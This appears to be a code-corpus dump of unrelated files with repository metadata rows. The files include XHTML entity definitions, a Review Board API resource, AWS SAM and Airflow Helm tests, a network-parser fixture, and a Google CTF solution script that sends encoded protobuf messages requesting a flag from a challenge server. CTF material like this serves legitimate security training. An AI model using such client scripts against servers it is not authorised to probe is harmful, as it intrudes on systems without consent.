<!ENTITY sbquo "‚" ><!-- single low-9 quotation mark, U+201A NEW -->
<!ENTITY ldquo "“" ><!-- left double quotation mark, U+201C ISOnum -->
<!ENTITY rdquo "”" ><!-- right double quotation mark, U+201D ISOnum -->
<!ENTITY bdquo "„" ><!-- double low-9 quotation mark, U+201E NEW -->
<!ENTITY dagger "†" ><!-- dagger, U+2020 ISOpub -->
<!ENTITY Dagger "‡" ><!-- double dagger, U+2021 ISOpub -->
<!ENTITY permil "‰" ><!-- per mille sign, U+2030 ISOtech -->
<!-- lsaquo is proposed but not yet ISO standardized -->
<!ENTITY lsaquo "‹" ><!-- single left-pointing angle quotation mark, U+2039 ISO proposed -->
<!-- rsaquo is proposed but not yet ISO standardized -->
<!ENTITY rsaquo "›" ><!-- single right-pointing angle quotation mark, U+203A ISO proposed -->
<!ENTITY euro "€" ><!-- euro sign, U+20AC NEW -->
<!-- end of xhtml-special.ent -->
F.1.3. XHTML Mathematical, Greek, and Symbolic Characters
You can download this version of this file from http://www.w3.org/TR/2010/REC-xhtml-modularization/DTD/xhtml-symbol.ent. The latest version is available at http://www.w3.org/MarkUp/DTD/xhtml-symbol.ent.
<!-- ...................................................................... -->
<!-- ISO Math, Greek and Symbolic Character Entity Set for XHTML .......... -->
<!-- file: xhtml-symbol.ent
Typical invocation:
<!ENTITY % xhtml-symbol
PUBLIC "-//W3C//ENTITIES Symbols for XHTML//EN"
"xhtml-symbol.ent" >
%xhtml-symbol;
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//ENTITIES Symbols for XHTML//EN"
SYSTEM "http://www.w3.org/MarkUp/DTD/xhtml-symbol.ent"
Revision: Id: xhtml-symbol.ent,v 4.1 2001/04/10 09:34:14 altheim Exp $ SMI
Portions (C) International Organization for Standardization 1986:
Permission to copy in any form is granted for use with conforming
SGML systems and applications as defined in ISO 8879, provided
this notice is included in all copies.
-->
<!-- Relevant ISO entity set is given unless names are newly introduced.
New names (i.e., not in ISO 8879 [SGML] list) do not clash with
any existing ISO 8879 entity names. ISO 10646 [ISO10646] character
numbers are given for each character, in hex. Entity values are
decimal conversions of the ISO 10646 values and refer to the
document character set. Names are Unicode [UNICODE] names.
-->
<!-- Latin Extended-B -->
<!ENTITY fnof "ƒ" ><!-- latin small f with hook = function
= florin, U+0192 ISOtech -->
<!-- Greek -->
<!ENTITY Alpha "Α" ><!-- greek capital letter alpha, U+0391 -->
<!ENTITY Beta "Β" ><!-- greek capital letter beta, U+0392 -->
<!ENTITY Gamma "Γ" ><!-- greek capital letter gamma, U+0393 ISOgrk3 -->
<!ENTITY Delta "Δ" ><!-- greek capital letter delta, U+0394 ISOgrk3 -->
<!ENTITY Epsilon "Ε" ><!-- greek capital letter epsilon, U+0395 -->
<!ENTITY Zeta "Ζ" ><!-- greek capital letter zeta, U+0396 -->
<!ENTITY Eta "Η" ><!-- greek capital letter eta, U+0397 -->
<!ENTITY Theta "Θ" ><!-- greek capital letter theta, U+0398 ISOgrk3 -->
<!ENTITY Iota "Ι" ><!-- greek capital letter iota, U+0399 -->
<!ENTITY Kappa "Κ" ><!-- greek capital letter kappa, U+039A -->
<!ENTITY Lambda "Λ" ><!-- greek capital letter lambda, U+039B ISOgrk3 -->
<!ENTITY Mu "Μ" ><!-- greek capital letter mu, U+039C -->
<!ENTITY Nu "Ν" ><!-- greek capital letter nu, U+039D -->
<!ENTITY Xi "Ξ" ><!-- greek capital letter xi, U+039E ISOgrk3 -->
<!ENTITY Omicron "Ο" ><!-- greek capital letter omicron, U+039F -->
<!ENTITY Pi "Π" ><!-- greek capital letter pi, U+03A0 ISOgrk3 -->
<!ENTITY Rho "Ρ" ><!-- greek capital letter rho, U+03A1 -->
<!-- there is no Sigmaf, and no U+03A2 character either -->
<!ENTITY Sigma "Σ" ><!-- greek capital letter sigma, U+03A3 ISOgrk3 -->
<!ENTITY Tau "Τ" ><!-- greek capital letter tau, U+03A4 -->
<!ENTITY Upsilon "Υ" ><!-- greek capital letter upsilon,
U+03A5 ISOgrk3 -->
<!ENTITY Phi "Φ" ><!-- greek capital letter phi, U+03A6 ISOgrk3 -->
<!ENTITY Chi "Χ" ><!-- greek capital letter chi, U+03A7 -->
<!ENTITY Psi "Ψ" ><!-- greek capital letter psi, U+03A8 ISOgrk3 -->
<!ENTITY Omega "Ω" ><!-- greek capital letter omega, U+03A9 ISOgrk3 -->
<!ENTITY alpha "α" ><!-- greek small letter alpha, U+03B1 ISOgrk3 -->
<!ENTITY beta "β" ><!-- greek small letter beta, U+03B2 ISOgrk3 -->
<!ENTITY gamma "γ" ><!-- greek small letter gamma, U+03B3 ISOgrk3 -->
<!ENTITY delta "δ" ><!-- greek small letter delta, U+03B4 ISOgrk3 -->
<!ENTITY epsilon "ε" ><!-- greek small letter epsilon, U+03B5 ISOgrk3 -->
<!ENTITY zeta "ζ" ><!-- greek small letter zeta, U+03B6 ISOgrk3 -->
<!ENTITY eta "η" ><!-- greek small letter eta, U+03B7 ISOgrk3 -->
<!ENTITY theta "θ" ><!-- greek small letter theta, U+03B8 ISOgrk3 -->
<!ENTITY iota "ι" ><!-- greek small letter iota, U+03B9 ISOgrk3 -->
<!ENTITY kappa "κ" ><!-- greek small letter kappa, U+03BA ISOgrk3 -->
<!ENTITY lambda "λ" ><!-- greek small letter lambda, U+03BB ISOgrk3 -->
<!ENTITY mu "μ" ><!-- greek small letter mu, U+03BC ISOgrk3 -->
<!ENTITY nu "ν" ><!-- greek small letter nu, U+03BD ISOgrk3 -->
<!ENTITY xi "ξ" ><!-- greek small letter xi, U+03BE ISOgrk3 -->
<!ENTITY omicron "ο" ><!-- greek small letter omicron, U+03BF NEW -->
<!ENTITY pi "π" ><!-- greek small letter pi, U+03C0 ISOgrk3 -->
<!ENTITY rho "ρ" ><!-- greek small letter rho, U+03C1 ISOgrk3 -->
<!ENTITY sigmaf "ς" ><!-- greek small letter final sigma, U+03C2 ISOgrk3 -->
<!ENTITY sigma "σ" ><!-- greek small letter sigma, U+03C3 ISOgrk3 -->
<!ENTITY tau "τ" ><!-- greek small letter tau, U+03C4 ISOgrk3 -->
<!ENTITY upsilon "υ" ><!-- greek small letter upsilon, U+03C5 ISOgrk3 -->
<!ENTITY phi "φ" ><!-- greek small letter phi, U+03C6 ISOgrk3 -->
<!ENTITY chi "χ" ><!-- greek small letter chi, U+03C7 ISOgrk3 -->
<!ENTITY psi "ψ" ><!-- greek small letter psi, U+03C8 ISOgrk3 -->
<!ENTITY omega "ω" ><!-- greek small letter omega, U+03C9 ISOgrk3 -->
<!ENTITY thetasym "ϑ" ><!-- greek small letter theta symbol, U+03D1 NEW -->
<!ENTITY upsih "ϒ" ><!-- greek upsilon with hook symbol, U+03D2 NEW -->
<!ENTITY piv "ϖ" ><!-- greek pi symbol, U+03D6 ISOgrk3 -->
<!-- General Punctuation -->
<!ENTITY bull "•" ><!-- bullet = black small circle, U+2022 ISOpub -->
<!-- bullet is NOT the same as bullet operator, U+2219 -->
<!ENTITY hellip "…" ><!-- horizontal ellipsis = three dot leader, U+2026 ISOpub -->
<!ENTITY prime "′" ><!-- prime = minutes = feet, U+2032 ISOtech -->
<!ENTITY Prime "″" ><!-- double prime = seconds = inches, U+2033 ISOtech -->
<!ENTITY oline "‾" ><!-- overline = spacing overscore, U+203E NEW -->
<!ENTITY frasl "⁄" ><!-- fraction slash, U+2044 NEW -->
<!-- Letterlike Symbols -->
<!ENTITY weierp "℘" ><!-- script capital P = power set = Weierstrass p, U+2118 ISOamso -->
<!ENTITY image "ℑ" ><!-- blackletter capital I = imaginary part, U+2111 ISOamso -->
<!ENTITY real "ℜ" ><!-- blackletter capital R = real part symbol, U+211C ISOamso -->
<!ENTITY trade "™" ><!-- trade mark sign, U+2122 ISOnum -->
<!ENTITY alefsym "ℵ" ><!-- alef symbol = first transfinite cardinal, U+2135 NEW -->
<!-- alef symbol is NOT the same as hebrew letter alef, U+05D0 although
the same glyph could be used to depict both characters -->
<!-- Arrows -->
<!ENTITY larr "←" ><!-- leftwards arrow, U+2190 ISOnum -->
<!ENTITY uarr "↑" ><!-- upwards arrow, U+2191 ISOnum-->
<!ENTITY rarr "→" ><!-- rightwards arrow, U+2192 ISOnum -->
<!ENTITY darr "↓" ><!-- downwards arrow, U+2193 ISOnum -->
<!ENTITY harr "↔" ><!-- left right arrow, U+2194 ISOamsa -->
<!ENTITY crarr "↵" ><!-- downwards arrow with corner leftwards
= carriage return, U+21B5 NEW -->
<!ENTITY lArr "⇐" ><!-- leftwards double arrow, U+21D0 ISOtech -->
<!-- Unicode does not say that lArr is the same as the 'is implied by' arrow
but also does not have any other character for that function. So ? lArr can
be used for 'is implied by' as ISOtech suggests -->
<!ENTITY uArr "⇑" ><!-- upwards double arrow, U+21D1 ISOamsa -->
<!ENTITY rArr "⇒" ><!-- rightwards double arrow, U+21D2 ISOtech -->
<!-- Unicode does not say this is the 'implies' character but does not have
another character with this function so ?
rArr can be used for 'implies' as ISOtech suggests -->
<!ENTITY dArr "⇓" ><!-- downwards double arrow, U+21D3 ISOamsa -->
<!ENTITY hArr "⇔" ><!-- left right double arrow, U+21D4 ISOamsa -->
<!-- Mathematical Operators -->
<!ENTITY forall "∀" ><!-- for all, U+2200 ISOtech -->
<!ENTITY part "∂" ><!-- partial differential, U+2202 ISOtech -->
<!ENTITY exist "∃" ><!-- there exists, U+2203 ISOtech -->
<!ENTITY empty "∅" ><!-- empty set = null set, U+2205 ISOamso -->
<!ENTITY nabla "∇" ><!-- nabla = backward difference, U+2207 ISOtech -->
<!ENTITY isin "∈" ><!-- element of, U+2208 ISOtech -->
<!ENTITY notin "∉" ><!-- not an element of, U+2209 ISOtech -->
<!ENTITY ni "∋" ><!-- contains as member, U+220B ISOtech -->
<!-- should there be a more memorable name than 'ni'? -->
<!ENTITY prod "∏" ><!-- n-ary product = product sign, U+220F ISOamsb -->
<!-- prod is NOT the same character as U+03A0 'greek capital letter pi' though
the same glyph might be used for both -->
<!ENTITY sum "∑" ><!-- n-ary sumation, U+2211 ISOamsb -->
<!-- sum is NOT the same character as U+03A3 'greek capital letter sigma'
though the same glyph might be used for both -->
<!ENTITY minus "−" ><!-- minus sign, U+2212 ISOtech -->
<!ENTITY lowast "∗" ><!-- asterisk operator, U+2217 ISOtech -->
<!ENTITY radic "√" ><!-- square root = radical sign, U+221A ISOtech -->
<!ENTITY prop "∝" ><!-- proportional to, U+221D ISOtech -->
<!ENTITY infin "∞" ><!-- infinity, U+221E ISOtech -->
<!ENTITY ang "∠" ><!-- angle, U+2220 ISOamso -->
<!ENTITY and "∧" ><!-- logical and = wedge, U+2227 ISOtech -->
<!ENTITY or "∨" ><!-- logical or = vee, U+2228 ISOtech -->
<!ENTITY cap "∩" ><!-- intersection = cap, U+2229 ISOtech -->
<!ENTITY cup "∪" ><!-- union = cup, U+222A ISOtech -->
<!ENTITY int "∫" ><!-- integral, U+222B ISOtech -->
<!ENTITY there4 "∴" ><!-- therefore, U+2234 ISOtech -->
<!ENTITY sim "∼" ><!-- tilde operator = varies with = similar to, U+223C ISOtech -->
<!-- tilde operator is NOT the same character as the tilde, U+007E,
although the same glyph might be used to represent both -->
<!ENTITY cong "≅" ><!-- approximately equal to, U+2245 ISOtech -->
<!ENTITY asymp "≈" ><!-- almost equal to = asymptotic to, U+2248 ISOamsr -->
<!ENTITY ne "≠" ><!-- not equal to, U+2260 ISOtech -->
<!ENTITY equiv "≡" ><!-- identical to, U+2261 ISOtech -->
<!ENTITY le "≤" ><!-- less-than or equal to, U+2264 ISOtech -->
<!ENTITY ge "≥" ><!-- greater-than or equal to, U+2265 ISOtech -->
<!ENTITY sub "⊂" ><!-- subset of, U+2282 ISOtech -->
<!ENTITY sup "⊃" ><!-- superset of, U+2283 ISOtech -->
<!-- note that nsup, 'not a superset of, U+2283' is not covered by the Symbol
font encoding and is not included. Should it be, for symmetry?
It is in ISOamsn -->
<!ENTITY nsub "⊄" ><!-- not a subset of, U+2284 ISOamsn -->
<!ENTITY sube "⊆" ><!-- subset of or equal to, U+2286 ISOtech -->
<!ENTITY supe "⊇" ><!-- superset of or equal to, U+2287 ISOtech -->
<!ENTITY oplus "⊕" ><!-- circled plus = direct sum, U+2295 ISOamsb -->
<!ENTITY otimes "⊗" ><!-- circled times = vector product, U+2297 ISOamsb -->
<!ENTITY perp "⊥" ><!-- up tack = orthogonal to = perpendicular, U+22A5 ISOtech -->
<!ENTITY sdot "⋅" ><!-- dot operator, U+22C5 ISOamsb -->
<!-- dot operator is NOT the same character as U+00B7 middle dot -->
<!-- Miscellaneous Technical -->
<!ENTITY lceil "⌈" ><!-- left ceiling = apl upstile, U+2308 ISOamsc -->
<!ENTITY rceil "⌉" ><!-- right ceiling, U+2309 ISOamsc -->
<!ENTITY lfloor "⌊" ><!-- left floor = apl downstile, U+230A ISOamsc -->
<!ENTITY rfloor "⌋" ><!-- right floor, U+230B ISOamsc -->
<!ENTITY lang "〈" ><!-- left-pointing angle bracket = bra, U+2329 ISOtech -->
<!-- lang is NOT the same character as U+003C 'less than'
or U+2039 'single left-pointing angle quotation mark' -->
<!ENTITY rang "〉" ><!-- right-pointing angle bracket = ket, U+232A ISOtech -->
<!-- rang is NOT the same character as U+003E 'greater than'
or U+203A 'single right-pointing angle quotation mark' -->
<!-- Geometric Shapes -->
<!ENTITY loz "◊" ><!-- lozenge, U+25CA ISOpub -->
<!-- Miscellaneous Symbols -->
<!ENTITY spades "♠" ><!-- black spade suit, U+2660 ISOpub -->
<!-- black here seems to mean filled as opposed to hollow -->
<!ENTITY clubs "♣" ><!-- black club suit = shamrock, U+2663 ISOpub -->
<!ENTITY hearts "♥" ><!-- black heart suit = valentine, U+2665 ISOpub -->
<!ENTITY diams "♦" ><!-- black diamond suit, U+2666 ISOpub -->
<!-- end of xhtml-symbol.ent -->
"""
return text
def get_apache_license():
license = r"""/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
"""
return license
main()
|
6c4f125b269c723964462f1d91c9ead2290ad66c
|
88dda5e76cef286c7db3ae7e5d1a32d28f7815a3
|
/reviewboard/webapi/resources/watched_review_request.py
|
fc16eee201c3490e555dd9ffb789e0ff2e7e134c
|
[
"MIT"
] |
permissive
|
reviewboard/reviewboard
|
f4d3bada08ba9d6ef53add2d1fdb82bd6cc63a1e
|
c3a991f1e9d7682239a1ab0e8661cee6da01d537
|
refs/heads/master
| 2023-08-31T09:03:14.170335
| 2023-08-30T08:22:43
| 2023-08-30T08:22:43
| 285,304
| 1,141
| 353
|
MIT
| 2023-06-07T16:51:02
| 2009-08-22T21:39:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,491
|
py
|
watched_review_request.py
|
from djblets.util.decorators import augment_method_from
from reviewboard.webapi.decorators import webapi_check_local_site
from reviewboard.webapi.resources import resources
from reviewboard.webapi.resources.base_watched_object import \
BaseWatchedObjectResource
class WatchedReviewRequestResource(BaseWatchedObjectResource):
"""Lists and manipulates entries for review requests watched by the user.
These are requests that the user has starred in their Dashboard.
This resource can be used for listing existing review requests and adding
new review requests to watch.
Each item in the resource is an association between the user and the
review request. The entries in the list are not the review requests
themselves, but rather an entry that represents this association by
listing the association's ID (which can be used for removing the
association) and linking to the review request.
"""
name = 'watched_review_request'
uri_name = 'review-requests'
profile_field = 'starred_review_requests'
star_function = 'star_review_request'
unstar_function = 'unstar_review_request'
@property
def watched_resource(self):
"""Return the watched resource.
This is implemented as a property in order to work around
a circular reference issue.
"""
return resources.review_request
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def get(self, *args, **kwargs):
"""Redirects to the review request being watched.
Rather than returning a body with the entry, performing an HTTP GET
on this resource will redirect the client to the actual review request
being watched.
Clients must properly handle :http:`302` and expect this redirect
to happen.
"""
pass
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def get_list(self, *args, **kwargs):
"""Retrieves the list of watched review requests.
Each entry in the list consists of a numeric ID that represents the
entry for the watched review request. This is not necessarily the ID
of the review request itself. It's used for looking up the resource
of the watched item so that it can be removed.
"""
pass
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def create(self, *args, **kwargs):
"""Marks a review request as being watched.
        The ID of the review request must be passed as ``object_id``, and will
        store that review request in the list.
"""
pass
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def delete(self, *args, **kwargs):
"""Deletes a watched review request entry.
This is the same effect as unstarring a review request. It does
not actually delete the review request, just the entry in the list.
"""
pass
def serialize_object(self, obj, *args, **kwargs):
return {
'id': obj.display_id,
self.item_result_key: obj,
}
def get_watched_object(self, queryset, obj_id, local_site_name=None,
*args, **kwargs):
if local_site_name:
return queryset.get(local_id=obj_id)
else:
return queryset.get(pk=obj_id)
watched_review_request_resource = WatchedReviewRequestResource()
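# A minimal client-side sketch of the 302 handling described in ``get()`` above.
# Hedged illustration only: the host, username and entry ID in the URL are
# hypothetical, and ``requests`` is not otherwise used by this module.
if __name__ == '__main__':
    import requests

    url = 'https://rb.example.com/api/users/sam/watched/review-requests/42/'
    r = requests.get(url, allow_redirects=False)
    if r.status_code == 302:
        # Follow the redirect manually to the actual review request resource.
        print(requests.get(r.headers['Location']).json())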
|
d8c42c9ae4aa274cbba2abecc2de279d291906f6
|
8af4e173ab3be9b9fc5cf1b61dbb5da80234d5c7
|
/tests/integration/build_invoke/python/test_python_3_9.py
|
fb0b80b277ae51fd2f55012e0c09dfb3560229c7
|
[
"Apache-2.0"
] |
permissive
|
aws/aws-sam-cli-app-templates
|
d464da1665d84eda9f427f682b985538827d41b6
|
88380eb265d58c496ea80685d4a5701e3cfc13d2
|
refs/heads/master
| 2023-09-04T13:03:00.204479
| 2023-08-23T20:43:24
| 2023-08-23T20:43:24
| 211,362,544
| 354
| 230
|
Apache-2.0
| 2023-09-14T15:39:09
| 2019-09-27T16:42:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,388
|
py
|
test_python_3_9.py
|
from unittest import skip
from tests.integration.build_invoke.build_invoke_base import BuildInvokeBase
"""
For each template, it will test the following sam commands:
1. sam init
2. sam build --use-container (if self.use_container is False, --use-container will be omitted)
3. (if there are event jsons) for each event json, check that the `sam local invoke` response is valid json
"""
class BuildInvoke_python3_9_cookiecutter_aws_sam_hello_python(BuildInvokeBase.SimpleHelloWorldBuildInvokeBase):
directory = "python3.9/hello"
class BuildInvoke_python3_9_cookiecutter_aws_sam_eventBridge_python(
BuildInvokeBase.EventBridgeHelloWorldBuildInvokeBase
):
directory = "python3.9/event-bridge"
class BuildInvoke_python3_9_cookiecutter_aws_sam_quick_start_web_with_connectors(BuildInvokeBase.QuickStartWebBuildInvokeBase):
directory = "python3.9/web-conn"
class BuildInvoke_python3_9_cookiecutter_aws_sam_step_functions_with_connectors(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/step-func-conn"
@skip("eventbridge schema app requires credential to pull missing files, skip")
class BuildInvoke_python3_9_cookiecutter_aws_sam_eventbridge_schema_app_python(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/event-bridge-schema"
class BuildInvoke_python3_9_cookiecutter_aws_sam_step_functions_sample_app(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/step-func"
class BuildInvoke_python3_9_cookiecutter_aws_sam_efs_python(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/efs"
class BuildInvoke_python3_9_cookiecutter_aws_sam_hello_pt_python(BuildInvokeBase.SimpleHelloWorldBuildInvokeBase):
directory = "python3.9/hello-pt"
# if we want to check response json, we need to setup efs
class BuildInvoke_image_python3_9_cookiecutter_aws_sam_hello_python_lambda_image(
BuildInvokeBase.SimpleHelloWorldBuildInvokeBase
):
directory = "python3.9/hello-img"
class BuildInvoke_python3_9_pytorch(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-pytorch"
class BuildInvoke_python3_9_scikit(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-scikit"
class BuildInvoke_python3_9_tensorflow(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-tensorflow"
class BuildInvoke_python3_9_xgboost(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-xgboost"
|
516be4a8ec591bdf53874d19144fdbf95d86e2b0
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/iosxe/tests/ShowFlowMonitorCacheFilterInterface/cli/equal/golden_output2_expected.py
|
c9bbbbd52502665eaea1a7dfb463182267271d9a
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
golden_output2_expected.py
|
expected_output = {
"processed_flow": 560,
"matched_flow": 569,
"aggregated_flow": 569,
"showing_flow": "top 2",
"ipv6_source_address": ["4100:1:7:33::1", "150:1:2:10::1"],
"ipv6_dest_address": ["21:28:1::2", "110:1:1:10::1"],
"interface_input_val": ["Gi1/0/13", "Gi1/0/13"],
"ip_version": ["6", "6"],
"ip_protocol": ["59", "59"],
"ip_tos": ["0x00", "0x00"],
"interface_output_val": ["Null", "Null"],
"counter_packets_long": ["4", "8"],
"timestamp_abs_first": ["18:11:28.000", "18:11:34.000"],
"timestamp_abs_last": ["18:11:35.000", "18:11:36.000"],
"counter_bytes_layers_long": ["2048", "3712"],
}
|
e8ad314381949fe480df8082600ae9338eeba5d0
|
50dd46b8ece33f3cdd174284b15d1d51f89669d4
|
/2017/quals/2017-re-ascii-art/src/solution/solution.py
|
5a3e345d37b1eac3110438d474df767354add6d1
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
google/google-ctf
|
f99da1ee07729bbccb869fff1cbaed6a80e43bcc
|
df02323eaf945d15e124801c74abaadca2749dc7
|
refs/heads/master
| 2023-08-31T14:30:27.548081
| 2023-08-29T13:04:20
| 2023-08-29T13:04:20
| 131,317,137
| 4,136
| 607
|
Apache-2.0
| 2023-08-30T22:17:02
| 2018-04-27T15:56:03
|
Go
|
UTF-8
|
Python
| false
| false
| 1,485
|
py
|
solution.py
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import os
import requests
os.sys.path.insert(0, '../proto')
os.sys.path.insert(0, '../server')
import string_encoding
import aart_message_pb2
def send_encoded_message(msg):
serialized_msg = msg.SerializeToString()
encoded_message = string_encoding.encode_string(serialized_msg).encode("hex")
r = requests.post('http://' + server_address + '/', data = encoded_message)
print "Received content: ", string_encoding.decode_string(r.content.decode("hex"))
if __name__ == "__main__":
if len(os.sys.argv) != 2:
print "Missing server address"
exit()
server_address = os.sys.argv[1]
msg = aart_message_pb2.AArtMessage()
msg.type = aart_message_pb2.AArtMessage.R_HELLO
msg.client_id = 'A' * 32
msg.content = "HELLO"
send_encoded_message(msg)
msg.type = aart_message_pb2.AArtMessage.R_OPERATION
msg.content = "GET_FLAG"
send_encoded_message(msg)
|
7d79abf81aa838853983247bdbc8c8dd4fbd40eb
|
b8bbdfc593b6d816e67a344f720f90ec05236778
|
/helm_tests/security/test_kerberos.py
|
02c7d4e534c50f54604c349005ab9cd2c4b2eba0
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
apache/airflow
|
ed78db0a8bab7e096990e143926e52f518e288ab
|
1b122c15030e99cef9d4ff26d3781a7a9d6949bc
|
refs/heads/main
| 2023-09-01T08:37:34.556097
| 2023-09-01T06:49:05
| 2023-09-01T06:49:05
| 33,884,891
| 22,756
| 11,558
|
Apache-2.0
| 2023-09-14T20:12:36
| 2015-04-13T18:04:58
|
Python
|
UTF-8
|
Python
| false
| false
| 6,125
|
py
|
test_kerberos.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import json
import jmespath
from tests.charts.helm_template_generator import render_chart
class TestKerberos:
"""Tests kerberos."""
def test_kerberos_not_mentioned_in_render_if_disabled(self):
# the name is deliberately shorter as we look for "kerberos" in the rendered chart
k8s_objects = render_chart(name="no-krbros", values={"kerberos": {"enabled": False}})
# ignore airflow config map
k8s_objects_to_consider = [
obj for obj in k8s_objects if obj["metadata"]["name"] != "no-krbros-config"
]
k8s_objects_to_consider_str = json.dumps(k8s_objects_to_consider)
assert k8s_objects_to_consider_str.count("kerberos") == 1
def test_kerberos_envs_available_in_worker_with_persistence(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"workers": {
"kerberosSidecar": {"enabled": True},
"persistence": {
"enabled": True,
},
},
"kerberos": {
"enabled": True,
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/workers/worker-deployment.yaml"],
)
assert {"name": "KRB5_CONFIG", "value": "/etc/krb5.conf"} in jmespath.search(
"spec.template.spec.containers[0].env", docs[0]
)
assert {"name": "KRB5CCNAME", "value": "/var/kerberos-ccache/ccache"} in jmespath.search(
"spec.template.spec.containers[0].env", docs[0]
)
def test_kerberos_sidecar_resources(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"workers": {
"kerberosSidecar": {
"enabled": True,
"resources": {
"requests": {
"cpu": "200m",
"memory": "200Mi",
},
"limits": {
"cpu": "201m",
"memory": "201Mi",
},
},
},
},
},
show_only=["templates/workers/worker-deployment.yaml"],
)
assert jmespath.search("spec.template.spec.containers[2].resources.requests.cpu", docs[0]) == "200m"
assert (
jmespath.search("spec.template.spec.containers[2].resources.requests.memory", docs[0]) == "200Mi"
)
assert jmespath.search("spec.template.spec.containers[2].resources.limits.cpu", docs[0]) == "201m"
assert jmespath.search("spec.template.spec.containers[2].resources.limits.memory", docs[0]) == "201Mi"
    def test_kerberos_sidecar_resources_are_not_added_by_default(self):
docs = render_chart(
show_only=["templates/workers/worker-deployment.yaml"],
)
assert jmespath.search("spec.template.spec.containers[0].resources", docs[0]) == {}
def test_kerberos_keytab_exists_in_worker_when_enable(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"kerberos": {
"enabled": True,
"keytabBase64Content": "dGVzdGtleXRhYg==",
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/workers/worker-deployment.yaml"],
)
assert {
"name": "kerberos-keytab",
"subPath": "kerberos.keytab",
"mountPath": "/etc/airflow.keytab",
"readOnly": True,
} in jmespath.search("spec.template.spec.containers[0].volumeMounts", docs[0])
def test_kerberos_keytab_secret_available(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"kerberos": {
"enabled": True,
"keytabBase64Content": "dGVzdGtleXRhYg==",
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/secrets/kerberos-keytab-secret.yaml"],
)
assert jmespath.search('data."kerberos.keytab"', docs[0]) == "dGVzdGtleXRhYg=="
def test_kerberos_keytab_secret_unavailable_when_not_specified(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"kerberos": {
"enabled": True,
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/secrets/kerberos-keytab-secret.yaml"],
)
assert 0 == len(docs)
|
28d1e10eeaaf9fa96f8b4570c166d018529b2056
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/datamgr/metadata/metadata/util/datetime.py
|
5c4524a2b4a80335acb4fb147bdd138b0d3797b9
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661
| 2022-04-02T10:30:55
| 2022-04-02T10:30:55
| 381,257,882
| 101
| 51
|
NOASSERTION
| 2022-04-02T10:30:56
| 2021-06-29T06:10:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
datetime.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
